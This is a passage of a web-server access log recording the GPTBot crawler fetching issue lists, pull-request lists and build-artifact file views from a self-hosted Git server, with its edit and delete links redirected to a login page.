192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" +[17/Feb/2026:19:45:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:45:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:19:45:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:45:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:45:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:45:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:45:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:45:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs?display=source" [Client 74.7.227.38] [Length 11603] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" +[17/Feb/2026:19:45:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol-Debug.spec?display=source" [Client 74.7.227.38] [Length 12514] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol-Debug.spec" +[17/Feb/2026:19:45:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:45:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11146] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:45:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/OpcConnectionTest.csproj?display=source" [Client 74.7.227.38] [Length 11769] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/OpcConnectionTest.csproj" +[17/Feb/2026:19:45:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" +[17/Feb/2026:19:45:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" +[17/Feb/2026:19:45:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild%2fPostgresPatrol%2fxref-PostgresPatrol.html" [Client 74.7.227.38] [Length 19930] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" +[17/Feb/2026:19:45:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:45:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10164] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:45:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:45:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/index.html?display=source" [Client 74.7.227.38] [Length 38275] [Gzip 9.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/index.html" +[17/Feb/2026:19:45:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=source" [Client 74.7.227.38] [Length 211009] [Gzip 18.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:19:45:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=rendered" [Client 74.7.227.38] [Length 10982] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:19:45:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" +[17/Feb/2026:19:45:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" +[17/Feb/2026:19:45:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:45:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:45:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:45:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:45:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11287] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:19:45:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" +[17/Feb/2026:19:45:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10141] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:45:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10144] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:45:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=closed&type=all" +[17/Feb/2026:19:45:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26374] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:45:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10147] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:45:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9954] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:45:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9957] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:45:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:45:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:45:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=closed&type=all" +[17/Feb/2026:19:45:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:45:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs?display=source" [Client 74.7.227.38] [Length 12008] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" +[17/Feb/2026:19:45:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26374] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:45:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26372] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:45:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26345] [Gzip 11.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:45:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?state=closed&type=all" [Client 74.7.227.38] [Length 10125] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" +[17/Feb/2026:19:45:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" [Client 74.7.227.38] [Length 9842] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" +[17/Feb/2026:19:45:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:19:45:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:19:45:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:19:45:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:19:45:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11143] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs" +[17/Feb/2026:19:45:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11370] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:19:45:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt?display=source" [Client 74.7.227.38] [Length 14066] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" +[17/Feb/2026:19:45:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt?display=rendered" [Client 74.7.227.38] [Length 10989] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" +[17/Feb/2026:19:45:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr 